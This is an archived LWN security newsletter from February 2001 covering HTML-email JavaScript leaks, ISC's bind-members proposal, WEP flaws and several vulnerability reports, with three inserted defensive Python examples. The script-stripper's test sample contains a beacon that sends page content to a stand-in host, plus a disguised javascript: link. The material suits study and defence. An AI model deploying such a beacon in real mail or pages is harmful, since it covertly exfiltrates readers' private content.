Security

News and Editorials

Privacy issues with HTML-based email. The Privacy Foundation has issued an advisory regarding potential security problems with HTML-based email containing JavaScript code. When read by mail clients such as Netscape 6, Outlook or Outlook Express, JavaScript code included in a message can be used to silently report back to the original sender information such as to whom the message is forwarded or what additions are made to a forwarded message, potentially revealing sensitive information. This message from the politechbot.com mailing list provides a good summary of the issues involved, as well as links crediting the source of the security report. They sum it up pretty well: "Friends don't send friends HTML email". Note that not all HTML mail readers are affected. Some turn off JavaScript by default, while others automatically strip JavaScript from messages before displaying them. Now is a good time to determine how your mail client handles such messages.

ISC to close access to Bind security info? Last week's reported security vulnerabilities in both bind 4 and bind 8 were followed this week by plans from ISC (the company that has been developing bind 9) to create a new "bind-members" forum for the discussion and dissemination of security information related to bind. Membership in this forum would be strictly limited, a nondisclosure agreement would be required, and a fee would be charged. Theo de Raadt forwarded (to Bugtraq) a copy of an email message from Paul Vixie at ISC that discusses the proposal. As you might expect, a large amount of furor and discussion resulted. Kurt Seifried at SecurityPortal.com followed up on this issue with ISC and others. His article includes a brief email interview with Paul Vixie, who commented:

"An important point to make, if you're going to write about this, is that nothing ISC has historically done will stop. The code is still completely redistributable under the Berkeley-style license (which, unlike the GPL, allows vendors to distribute binaries based on modified sources without sharing those source modifications with ISC or anybody else). CERT will still be ISC's channel for announcing security bugs to the community. Patches will still be accepted from the community, and published to the community. The ONLY thing bind-members will do is ADD SOMETHING NEW."
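Returning to the HTML-email advisory above: the mitigation mentioned there, stripping JavaScript from a message before it is displayed, is shown below as an added example. It is not code from the Privacy Foundation, the politechbot.com message or the original page; it uses only the Python standard library, and the element and attribute lists, the blocked URL schemes and the sample message are assumptions made for the illustration.

```python
import html
import re
from html.parser import HTMLParser

# Elements removed together with everything inside them (assumed list).
ACTIVE_ELEMENTS = {"script", "object", "embed", "applet"}
# Attributes whose value is a URL and could carry a javascript: scheme (assumed list).
URL_ATTRS = {"href", "src", "action", "background", "formaction"}
# Schemes that execute or embed content rather than fetch a resource (assumed list).
BLOCKED_SCHEMES = {"javascript", "vbscript", "data"}
_CONTROL = re.compile(r"[\x00-\x20]")


def url_scheme(value):
    """Scheme of a URL after removing whitespace/control characters that
    browsers ignore, so 'java\\nscript:' is still recognised as javascript."""
    compact = _CONTROL.sub("", value).lower()
    scheme, sep, _rest = compact.partition(":")
    return scheme if sep else ""


class ScriptStripper(HTMLParser):
    """Re-emit an HTML message without script elements, on* handlers,
    blocked URL schemes or comments. Entities are passed through untouched."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self.skip_depth = 0  # >0 while inside an element we are dropping

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_ELEMENTS:
            self.skip_depth += 1
            return
        if not self.skip_depth:
            self.out.append(self._render(tag, attrs, self_closing=False))

    def handle_startendtag(self, tag, attrs):
        if tag not in ACTIVE_ELEMENTS and not self.skip_depth:
            self.out.append(self._render(tag, attrs, self_closing=True))

    def handle_endtag(self, tag):
        if tag in ACTIVE_ELEMENTS:
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if not self.skip_depth:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(data)

    def handle_entityref(self, name):
        if not self.skip_depth:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self.skip_depth:
            self.out.append(f"&#{name};")

    def handle_comment(self, data):
        pass  # comments carry nothing to display and can hide conditional markup

    def _render(self, tag, attrs, self_closing):
        parts = [tag]
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on"):          # event handlers: onload, onmouseover, ...
                continue
            if name in URL_ATTRS and value is not None and url_scheme(value) in BLOCKED_SCHEMES:
                continue
            if value is None:
                parts.append(name)
            else:
                parts.append(f'{name}="{html.escape(value, quote=True)}"')
        return "<" + " ".join(parts) + (" />" if self_closing else ">")


def strip_scripts(message_html):
    parser = ScriptStripper()
    parser.feed(message_html)
    parser.close()
    return "".join(parser.out)


# Constructed sample message: a body handler, a script that would report the
# displayed content back to sender.invalid, and a javascript: link split by a newline.
SAMPLE_HTML = (
    '<html><body onload="beacon()">'
    '<p>Hi &amp; bye</p>'
    '<script>new Image().src = "http://sender.invalid/?" + document.body.innerHTML;</script>'
    '<a href="java\nscript:beacon()">x</a>'
    '<a href="https://example.invalid/">ok</a>'
    '<img src="cid:logo" />'
    '</body></html>'
)
EXPECTED_HTML = (
    '<html><body><p>Hi &amp; bye</p><a>x</a>'
    '<a href="https://example.invalid/">ok</a><img src="cid:logo" /></body></html>'
)

if __name__ == "__main__":
    print(strip_scripts(SAMPLE_HTML))
```

The parser keeps a depth counter rather than a flag so that nested active elements are dropped as a whole, and attribute values are re-escaped on output because HTMLParser hands them over already unescaped. A display-side strip like this only removes what it recognises; turning script execution off in the mail client remains the stronger control.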
The commentary in the article from Linux-Mandrake, Immunix OS, and others, though, is still uniformly negative towards this move. From our perspective, though we sympathize with ISC's need to develop a revenue stream based on this Open Source product, their suggested model strongly resembles the X Consortium model (which Paul Vixie references). We consider that a failed model. In spite of the inclusion of non-profit members without a fee, the X Consortium eventually bogged down in corporate politics, failing to deliver quality development upgrades and leaving a vacuum that the XFree86 group has happily stepped in to fill. In a similar manner, the bind-members group could result in timely information about potential security problems not getting out, or one vendor's fixes being delayed because fixes from other vendors were not yet available. Given the widespread use of bind across the Internet, this is a cause for much concern. If ISC is, indeed, planning on offering services to vendors that are in addition to what it already offers on public mailing lists, they should certainly be able to require a fee for that service. However, the need for a non-disclosure agreement along with that fee has not been demonstrated. For more coverage on this issue, check out our editorial on this week's front page.

NSA attempting to design crack-proof computer (ZDNet). ZDNet looks at how VMware and the National Security Agency have teamed up to make a more secure PC. "Called "NetTop," VMware's answer would turn each computer into a number of virtual PCs running on a Linux computer that would sit on each worker's desk. The security system would erect supposedly impenetrable, but virtual, walls between public data and more sensitive information on the same computer." Note that VMware on Linux was considered an avenue for this development while VMware on Windows NT, etc., was not. Why? Because Linux provides the source code and Windows does not. NSA understands that they need the source code to be available to build a trusted system. NSA is therefore making a strong stand in support of Open Source, but not necessarily in support of Free Software. The article also discusses their plans to use commercial off-the-shelf software. Hopefully, closed source proprietary software will not be used while manipulating secure data ... otherwise, their exclusion of Microsoft's operating system will be meaningless. (Thanks to Richard Storey)

Security of the WEP algorithm. Nikita Borisov, Ian Goldberg, and David Wagner have posted a whitepaper describing vulnerabilities they see in the Wired Equivalent Privacy (WEP) algorithm, part of the 802.11 standard. The potential for passive and active attacks to decrypt traffic is described, as well as one to inject new traffic. "Our analysis suggests that all of these attacks are practical to mount using only inexpensive off-the-shelf equipment. We recommend that anyone using an 802.11 wireless network not rely on WEP for security, and employ other security measures to protect their wireless network."

Security Reports

SSH1 brute force password vulnerability. A potential vulnerability in SSH1 was reported this week involving the ability to brute force passwords due to the manner in which failed passwords are logged. A patch against ssh-1.2.30 is provided.

SSH protocol 1.5 key session recovery vulnerability. A second SSH problem was reported this week, this time with the SSH protocol 1.5. This advisory describes the vulnerability, which can allow the session key for an exchange to be captured and then used to decrypt session packets. ssh-1 "up to" ssh-1.2.31 is reportedly vulnerable, presumably meaning that ssh-1.2.31 is also affected. ssh-2.4.0 and later is not impacted because the server key is regenerated for every connection. SSH.com deprecates the use of SSH1. OpenSSH "up to" 2.3.0 is also vulnerable. A patch has been introduced into the OpenSSH source tree. Updated versions of OpenSSH and portable OpenSSH (for non-OpenBSD systems) have not yet been announced; presumably they'll be made available soon.

Linux kernel 2.4.1 denial-of-service vulnerability. A denial-of-service vulnerability has been reported in the Linux 2.4.1 kernel code. A patch for the problem is available and will be merged into the next prepatch for Linux 2.4.2. Distribution updates for the problem are unlikely to be seen, since most distributions have not yet begun shipping the new stable kernel series.

XEmacs/gnuserv execution of arbitrary code. gnuserv is a client/server package included with XEmacs, but also available as a standalone package. Via gnuserv's support for MIT-MAGIC-COOKIE authentication, it can be exploited remotely to execute arbitrary code. gnuserv 3.12.1 resolves the problem and is included with XEmacs 21.1.14. Check BugTraq ID 2333 for more details.

CUPS denial-of-service vulnerability. This is the second time we've seen reports of security problems in CUPS which appear to originate from Linux-Mandrake (i.e., no previous reports were seen on BugTraq or elsewhere). This time, a denial-of-service problem was reported that can be triggered via an extra-long input line. In addition, however, the Linux-Mandrake update apparently also includes other security-auditing steps, such as the replacement of sprintf calls with snprintf, strcpy with strncpy, etc., to better protect against other potential buffer overflows.
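The CUPS item above reports a denial of service triggered by an extra-long input line. The general defensive pattern for any line-oriented network service is to read each line under a fixed byte limit and, when the limit is exceeded, discard the remainder in bounded chunks so that the process neither grows without limit nor loses its place in the stream. The following is an added example of that pattern; it is not code from CUPS or from the Linux-Mandrake update, and the line limit, the toy request format and the sample input are assumptions.

```python
import io

MAX_LINE = 1024          # assumed per-line limit; a real protocol sets its own
DRAIN_CHUNK = 64 * 1024  # how much of an over-long line is held in memory at a time


class LineTooLong(ValueError):
    pass


def read_bounded_line(stream, max_len=MAX_LINE):
    """Read one line from a binary stream while holding at most max_len + 1
    bytes of it (plus one drain chunk). Returns the line without its terminator,
    None at EOF, and raises LineTooLong after skipping the rest of an over-long
    line so the caller is positioned at the start of the next line."""
    line = stream.readline(max_len + 1)
    if not line:
        return None
    if len(line) <= max_len or line.endswith(b"\n"):
        return line.rstrip(b"\r\n")
    # max_len + 1 bytes arrived with no newline: the line is too long. Drain the
    # remainder chunk by chunk instead of buffering a multi-megabyte line.
    discarded = len(line)
    while True:
        chunk = stream.readline(DRAIN_CHUNK)
        if not chunk:
            break
        discarded += len(chunk)
        if chunk.endswith(b"\n"):
            break
    raise LineTooLong(f"line longer than {max_len} bytes ({discarded} bytes skipped)")


def process_requests(stream, max_len=MAX_LINE):
    """Toy request loop: one request per line. Returns (status, detail) per line;
    an over-long line is rejected and processing continues with the next one."""
    results = []
    while True:
        try:
            line = read_bounded_line(stream, max_len)
        except LineTooLong as exc:
            results.append(("rejected", str(exc)))
            continue
        if line is None:
            return results
        results.append(("ok", line.decode("ascii", "replace")))


def read_first_line(data, max_len=MAX_LINE):
    """Convenience wrapper over an in-memory stream (used by the demonstration)."""
    return read_bounded_line(io.BytesIO(data), max_len)


# Constructed input: a normal request, a 1 MiB line, then another normal request.
SAMPLE_INPUT = b"JOB user=alice\n" + b"A" * (1024 * 1024) + b"\n" + b"JOB user=bob\n"


def run_sample():
    return process_requests(io.BytesIO(SAMPLE_INPUT))


if __name__ == "__main__":
    for status, detail in run_sample():
        print(status, detail[:60])
```

Reading with `readline(max_len + 1)` is what makes the check cheap: a line that fits returns at most `max_len` bytes plus its newline, and the single extra byte is the signal that the limit was crossed. The same idea is what replacing sprintf with snprintf buys in C, with the added step here of resynchronising on the next line instead of trusting whatever follows the truncation point.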
man -l format string vulnerability. A format string vulnerability in the man command was reported in its processing of the "-l" command line option. Note that not all versions of man provide the "-l" option. Only Debian and SuSE are reported to be affected, with varying results, due to varying permissions on the man binary. SuSE has confirmed the problem and promised an update soon. A bug report has been filed with Debian.

Multiple vulnerabilities in ProFTPD. Three vulnerabilities in ProFTPD have been reported to BugTraq in the past month, according to this advisory from the ProFTPD development team. The vulnerabilities include a SIZE memory leak, a USER memory leak and format string vulnerabilities (links to the original reports are provided through the advisory). ProFTPD 1.2.0rc3 has now been released with fixes for all the above problems.

Sporadic reports of nmap crashing bind 9.1.0. Reports have been posted to BugTraq describing reproducible crashes of bind 9.1.0 caused by nmap. On the other hand, each of those reports has been followed by anecdotal evidence that 9.1.0 does not crash on all platforms and setups. So far, no one has pinpointed the cause of the crash in the 9.1.0 source code, so while there is a potential denial-of-service problem, it has not yet been confirmed.

Infobot perl-based IRC bot remote execution of arbitrary commands. A security problem has been reported with the Infobot perl-based IRC bot which could be exploited to run arbitrary files under the IRC bot user id. Disabling fortran math in the configuration file and restarting is a workaround for the vulnerability. No patch or update has been reported yet.

cgi-bin scripts. The following cgi-bin scripts were reported to contain vulnerabilities:
Commercial products. The following commercial products were reported to contain vulnerabilities:
Updates

Multiple vulnerabilities in bind 8.2.2 and bind 4. Check the February 1st LWN Security Summary for the initial reports. Bind 8.2.3 contains fixes for the problems with 8.2.2. Bind 4 fixes are also available, but an upgrade to bind 8 or even bind 9 is generally considered a preferable approach. This week's updates:
Previous updates:
MySQL buffer overflow. Check the January 25th LWN Security Summary or BugTraq ID 2262 for the original reports. This can be exploited remotely to gain access to the system under the uid of the mysql server. MySQL 3.23.31 and earlier are affected. MySQL 3.23.32 fixes the problem. This week's updates:
kdesu password sniffing vulnerability. The KDE "kdesu" utility has a vulnerability that can allow a local user to steal passwords; see the January 25 LWN Security Section for the initial report. This week's updates:
Multiple glibc vulnerabilities. Multiple glibc vulnerabilities have been reported in recent weeks. Since glibc updates generally address all the problems, rather than one specific problem, we are combining the update report for them. For the original reports, check the January 18th, 2001, LWN Security Report under the topics "glibc RESOLV_HOST_CONF preload vulnerability" and "glibc local write/ld.so.cache preload vulnerability". This week's updates: Previous updates:
exmh symlink vulnerability. Check the January 18th LWN Security Summary for the initial report. This week's updates:
Resources

William Stearns announced the latest version of his ramenfind script, for detecting and removing the Ramen worm.

Osvaldo J. Filho posted a small patch to syslog which will log version requests for bind, helpful for noticing probes for the latest bind vulnerabilities.

Events

Upcoming security events.
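The syslog patch mentioned under Resources logs version requests so that probes for the bind vulnerabilities can be noticed. As an added example of the detection logic involved (not Osvaldo J. Filho's patch, which is against syslog, and not part of the original page), the following Python code parses DNS queries from their wire format and reports TXT queries for version.bind in the CHAOS class, which is how a resolver asks a name server for its version. The sample packets, source addresses and log-line format are constructed for the illustration; hostname.bind is included as the RFC 4892 companion name.

```python
import struct

DNS_CLASS_CH = 3   # CHAOS class, used for server-identification queries
DNS_TYPE_TXT = 16
# version.bind is the name the page's syslog patch is about; hostname.bind is the
# RFC 4892 companion. Both are answered with build information, so both are watched.
PROBE_NAMES = {"version.bind", "hostname.bind"}


def parse_qname(pkt, off):
    """Decode an uncompressed DNS name starting at pkt[off]; return (name, next_offset)."""
    labels = []
    while True:
        if off >= len(pkt):
            raise ValueError("truncated name")
        length = pkt[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0:
            # Compression pointers do not occur in a question section; treat as malformed.
            raise ValueError("compressed label in question")
        labels.append(pkt[off:off + length].decode("ascii", "replace"))
        off += length
    return ".".join(labels).lower(), off


def parse_questions(pkt):
    """Return (txid, [(name, qtype, qclass), ...]) for a query, or None for a response."""
    if len(pkt) < 12:
        raise ValueError("short packet")
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    if flags & 0x8000:  # QR bit set: a response, not something to log as a probe
        return None
    off, questions = 12, []
    for _ in range(qdcount):
        name, off = parse_qname(pkt, off)
        if off + 4 > len(pkt):
            raise ValueError("truncated question")
        qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
        off += 4
        questions.append((name, qtype, qclass))
    return txid, questions


def version_probe(pkt):
    """Return the probed name if the query asks for a watched name as TXT in class CH, else None.
    Malformed packets are reported as None rather than raising, so a scan never stops on junk."""
    try:
        parsed = parse_questions(pkt)
    except ValueError:
        return None
    if parsed is None:
        return None
    for name, qtype, qclass in parsed[1]:
        if name in PROBE_NAMES and qclass == DNS_CLASS_CH and qtype == DNS_TYPE_TXT:
            return name
    return None


def build_query(name, qtype, qclass, txid=0x1234):
    """Constructed query builder for the sample traffic (RD set, one question, no answers)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, qclass)


def scan(packets):
    """packets: iterable of (source, raw UDP payload). Returns syslog-style lines for probes."""
    lines = []
    for src, pkt in packets:
        name = version_probe(pkt)
        if name:
            lines.append(f"named: {name} TXT CH query from {src}")
    return lines


# Constructed sample traffic using documentation addresses; no real hosts involved.
SAMPLE_PACKETS = [
    ("192.0.2.10", build_query("www.example.com", 1, 1)),                    # ordinary A lookup
    ("192.0.2.20", build_query("version.bind", DNS_TYPE_TXT, DNS_CLASS_CH)),  # the probe
    ("192.0.2.30", build_query("VERSION.BIND", DNS_TYPE_TXT, DNS_CLASS_CH)),  # case varies on the wire
    ("192.0.2.40", build_query("version.bind", DNS_TYPE_TXT, 1)),             # IN class: not the CH probe
]

if __name__ == "__main__":
    for line in scan(SAMPLE_PACKETS):
        print(line)
```

Matching on class as well as name keeps the signal clean: a query for version.bind in class IN is simply an unknown name to the server and returns nothing of interest, whereas the CH TXT form is the one that reveals the build. A name server that also answers these queries with a fixed string (bind's version option) makes the logged probe a harmless event rather than a disclosure.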
For additional security-related events, including training courses (which we don't list above) and events further in the future, check out Security Focus' calendar, one of the primary resources we use for building the above list. To submit an event directly to us, please send a plain-text message to lwn@lwn.net.

Section Editor: Liz Coolbaugh
February 8, 2001